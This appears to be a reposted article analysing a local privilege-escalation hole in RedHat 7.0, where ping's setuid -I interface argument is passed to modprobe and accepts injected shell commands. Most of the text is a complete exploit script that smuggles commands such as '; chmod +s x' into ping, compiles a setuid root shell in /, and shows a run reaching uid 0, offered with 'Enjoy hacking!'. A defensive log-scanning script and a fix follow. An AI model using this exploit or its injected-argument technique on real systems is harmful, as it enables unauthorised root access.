Redhat7 detailed analysis of the local ping root vulnerability
Source: Internet
Author: User
Author: Daying
First, I declare that neither I nor my company is responsible for any losses caused by using this vulnerability. The attack code is short; you can write it in shell or Perl, and shell is recommended here.
Principle:
This is perhaps a major vulnerability in RedHat 7: the -I parameter of its ping program, which specifies the network interface, is passed through modprobe and insmod, and this makes it possible to execute arbitrary code.
As everyone knows, the permissions of the ping program are as follows:
[hello!sune4gle]$ ls -l /bin/ping
-rwsr-xr-x 1 root 20604 Aug 8 2000 /bin/ping
The ping program carries the setuid bit because it needs to open a raw socket.
The key, of course, is the parameter placed before the IP address: that is the command we want to run. Because of the s (setuid) bit, even when ping is run from an ordinary uid its euid is 0, so any command ping runs on our behalf actually executes with superuser privileges. So if we run the following command:
[hello!sune4gle]$ ping -I '; chmod o+w .' 195.117.3.59 &>/dev/null
the current directory becomes writable by other users.
Then you can write a C program, compile it, and run it:
cat > /x.c <<_eof_
main(){
setuid(0); seteuid(0);
system("chmod 755 /; rm -f /x.c");
execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
Is everything clear so far? Create the file x.c in /, compile it, and then give the binary the s bit as well, which yields a setuid root shell. The finished attack code follows:
#!/bin/sh
echo
echo "RedHat 7.0 exploit"
echo "(c) 2000 suneagle"
echo
echo "Enjoy hacking! :)"
echo
PING=/bin/ping
test -u $PING || PING=/bin/ping
if [ ! -u $PING ]; then
echo "Sorry, no setuid ping."
exit 0
fi
echo "Phase 1: making / world-writable..."
$PING -I '; chmod o+w .' 195.117.3.59 &>/dev/null
sleep 1
echo "Phase 2: compiling helper program in /..."
cat > /x.c <<_eof_
main(){
setuid(0); seteuid(0);
system("chmod 755 /; rm -f /x.c");
execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
echo "Phase 3: chown + chmod on our helper program..."
$PING -I '; chown 0 x' 202.102.3.1 &>/dev/null
sleep 1
$PING -I '; chmod +s x' 202.101.23.1 &>/dev/null
sleep 1
if [ ! -u /x ]; then
echo "Apparently, this is not exploitable on this system :("
exit 1
fi
echo "Ye! Entering rootshell..."
/x
echo "Thank you."
Haha, OK. Here is the result of running this shell script on RedHat 7:
First, I need an ordinary user account.
[hello!sune4gle]$ ./getroot.sh
RedHat 7.0 exploit
(c) 2000 suneagle
Enjoy hacking! :)
Phase 1: making / world-writable...
Phase 2: compiling helper program in /...
Phase 3: chown + chmod on our helper program...
Ye! Entering rootshell...
[hello!root]# id
uid=0(root) gid=500(sune4gle) groups=500(sune4gle)
[hello!root]#
Log entries left after the attack:
Feb 24 11:16:27 sune4gle modprobe: insmod; chmod o+w . failed
Feb 24 11:16:30 sune4gle modprobe: insmod; chown 0 x failed
Feb 24 11:16:31 sune4gle modprobe: insmod; chmod +s x failed
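The three log lines above are the trace this bug leaves: modprobe is asked to load a "module" whose name is really the attacker's ping -I argument. As an added example that is not part of the original article, here is a small Python checker that parses syslog lines of that shape and flags modprobe/insmod failures whose module name contains shell metacharacters; the sample lines embedded in it are constructed to match the page's output, plus two benign entries.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample syslog text: three lines modelled on the page's log,
# then a legitimate failed autoload and an unrelated kernel message.
SAMPLE_LOG = """\
Feb 24 11:16:27 sune4gle modprobe: insmod; chmod o+w . failed
Feb 24 11:16:30 sune4gle modprobe: insmod; chown 0 x failed
Feb 24 11:16:31 sune4gle modprobe: insmod; chmod +s x failed
Feb 24 11:20:02 sune4gle modprobe: insmod eth0 failed
Feb 24 11:21:10 sune4gle kernel: eth0: link up
"""

# classic syslog layout: "<Mon dd hh:mm:ss> <host> <program>: <message>"
SYSLOG_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) ([^:]+): (.*)$")
# modprobe's complaint when an autoload request fails; group 1 is the "module name"
INSMOD_RE = re.compile(r"^insmod\s*(.*?)\s+failed$")
# characters that never belong in a real module or interface name
META_RE = re.compile(r"[;|&`$()<>\s]")


@dataclass
class Finding:
    timestamp: str
    host: str
    module_arg: str
    reason: str


def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line shows modprobe handed shell-like input, else None."""
    m = SYSLOG_RE.match(line.rstrip("\n"))
    if not m or m.group(3) != "modprobe":
        return None
    im = INSMOD_RE.match(m.group(4))
    if not im:
        return None
    arg = im.group(1).strip()
    if META_RE.search(arg):
        return Finding(m.group(1), m.group(2), arg, "shell metacharacter in module name")
    return None


def scan_log(text: str) -> List[Finding]:
    """Scan a whole syslog text and collect suspicious modprobe entries."""
    return [f for f in (inspect_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host}: {f.reason}: {f.module_arg!r}")
```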
Solution:
Remove or restrict the setuid bit of the ping program:
[hello!sune4gle]# chmod 655 /bin/ping